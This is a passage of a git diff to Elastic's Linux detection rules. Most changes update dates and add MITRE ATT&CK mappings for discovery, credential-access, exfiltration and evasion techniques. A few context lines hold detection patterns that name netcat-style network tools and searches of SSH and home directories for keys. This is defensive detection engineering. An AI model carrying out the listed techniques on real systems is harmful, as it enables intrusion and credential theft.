"auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -119,7 +124,6 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.threshold] field = ["host.id", "process.parent.entity_id", "process.executable"] value = 1 diff --git a/rules/linux/discovery_polkit_version_discovery.toml b/rules/linux/discovery_polkit_version_discovery.toml index 2420b1dc14c..12be701fa44 100644 --- a/rules/linux/discovery_polkit_version_discovery.toml +++ b/rules/linux/discovery_polkit_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,6 +115,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml index 413d337fc5a..b5aaf68561b 100644 --- a/rules/linux/discovery_private_key_password_searching_activity.toml +++ b/rules/linux/discovery_private_key_password_searching_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ process.command_line like ("*/home/*", "*/etc/ssh*", "*/root/*", "/") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" @@ -128,6 +133,11 @@ id = "T1552.001" name = "Credentials In Files" reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/discovery_process_capabilities.toml b/rules/linux/discovery_process_capabilities.toml index 41b4c8bda26..17213c9ac70 100644 --- a/rules/linux/discovery_process_capabilities.toml +++ b/rules/linux/discovery_process_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,6 +105,11 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml index c80d995820a..8651c5b6ca2 100644 --- a/rules/linux/discovery_security_file_access_via_common_utility.toml +++ b/rules/linux/discovery_security_file_access_via_common_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,7 +125,30 @@ process.args like ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml b/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml index 6f3aab1b3ca..a7db2fe6646 100644 --- a/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml +++ b/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -150,6 +150,11 @@ from logs-endpoint.events.network-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" diff --git a/rules/linux/discovery_sudo_allowed_command_enumeration.toml b/rules/linux/discovery_sudo_allowed_command_enumeration.toml index 9c5015f5db1..4dc21585e5e 100644 --- a/rules/linux/discovery_sudo_allowed_command_enumeration.toml +++ b/rules/linux/discovery_sudo_allowed_command_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,14 +106,41 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/discovery_suspicious_memory_grep_activity.toml b/rules/linux/discovery_suspicious_memory_grep_activity.toml index 56148d7dbb8..7830ed690af 100644 --- a/rules/linux/discovery_suspicious_memory_grep_activity.toml +++ b/rules/linux/discovery_suspicious_memory_grep_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/05" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,6 +90,11 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml index e78382373b9..4bf51659a5f 100644 --- a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml +++ b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -146,3 +146,16 @@ reference = "https://attack.mitre.org/techniques/T1595/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_suspicious_which_command_execution.toml b/rules/linux/discovery_suspicious_which_command_execution.toml index 732545b5d3b..70658812d74 100644 --- a/rules/linux/discovery_suspicious_which_command_execution.toml +++ b/rules/linux/discovery_suspicious_which_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,23 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_unusual_user_enumeration_via_id.toml b/rules/linux/discovery_unusual_user_enumeration_via_id.toml index e855e9a3297..bd4ae498b4b 100644 --- a/rules/linux/discovery_unusual_user_enumeration_via_id.toml +++ b/rules/linux/discovery_unusual_user_enumeration_via_id.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,6 +109,26 @@ id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1087/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml index db90a1ad7af..4fc88b14ba4 100644 --- a/rules/linux/discovery_virtual_machine_fingerprinting.toml +++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,7 +142,35 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_yum_dnf_plugin_detection.toml b/rules/linux/discovery_yum_dnf_plugin_detection.toml index 2d0397313ad..1672b6a16b4 100644 --- a/rules/linux/discovery_yum_dnf_plugin_detection.toml +++ b/rules/linux/discovery_yum_dnf_plugin_detection.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,6 +117,16 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml index 6310d47ea9b..a6c74f46cc4 100644 --- a/rules/linux/execution_abnormal_process_id_file_created.toml +++ b/rules/linux/execution_abnormal_process_id_file_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,6 +153,23 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/execution_container_management_binary_launched_inside_container.toml b/rules/linux/execution_container_management_binary_launched_inside_container.toml index f32d2b56652..c2cb790e00e 100644 --- a/rules/linux/execution_container_management_binary_launched_inside_container.toml +++ b/rules/linux/execution_container_management_binary_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1609/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml index ecf13768813..b467de4246f 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,6 +123,16 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" diff --git a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml index e3029462837..b2d2d1ad475 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,6 +134,16 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" diff --git a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml index 9a89825b302..02db558cf6d 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,14 +132,23 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml index 21393246708..9f190ca97d1 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -148,14 +148,80 @@ process.parent.name in ("foomatic-rip", "cupsd") and process.command_line like ( [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml index 4f987d0a01c..d0e7ede71e6 100644 --- a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml +++ b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,3 +113,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_executable_stack_execution.toml b/rules/linux/execution_executable_stack_execution.toml index db15ac7e5ad..35222dec4d9 100644 --- a/rules/linux/execution_executable_stack_execution.toml +++ b/rules/linux/execution_executable_stack_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2025/01/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,3 +105,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1620" +name = "Reflective Code Loading" +reference = "https://attack.mitre.org/techniques/T1620/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml index d2a3a87c967..b597a771bd4 100644 --- a/rules/linux/execution_file_execution_followed_by_deletion.toml +++ b/rules/linux/execution_file_execution_followed_by_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,3 +123,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml index 18431eba5ca..48c6e1b68b6 100644 --- a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml +++ b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,7 +123,35 @@ id = "T1222.002" name = "Linux and Mac File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/002/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml index 59cdf65a41e..308b4452652 100644 --- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml +++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -161,3 +161,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[[rule.threat.technique.subtechnique]] +id = "T1048.003" +name = "Exfiltration Over Unencrypted Non-C2 Protocol" +reference = "https://attack.mitre.org/techniques/T1048/003/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/execution_kubectl_apply_pod_from_url.toml b/rules/linux/execution_kubectl_apply_pod_from_url.toml index 7358ddd13d1..93e9de69f4d 100644 --- a/rules/linux/execution_kubectl_apply_pod_from_url.toml +++ b/rules/linux/execution_kubectl_apply_pod_from_url.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,16 +116,16 @@ not process.args like~ ("*download.elastic.co*", "*github.com/kubernetes-sigs/*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml index 15462abd9f1..f7e21e35d61 100644 --- a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml +++ b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -144,6 +144,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -153,3 +158,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.007" +name = "Container API" +reference = "https://attack.mitre.org/techniques/T1552/007/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml 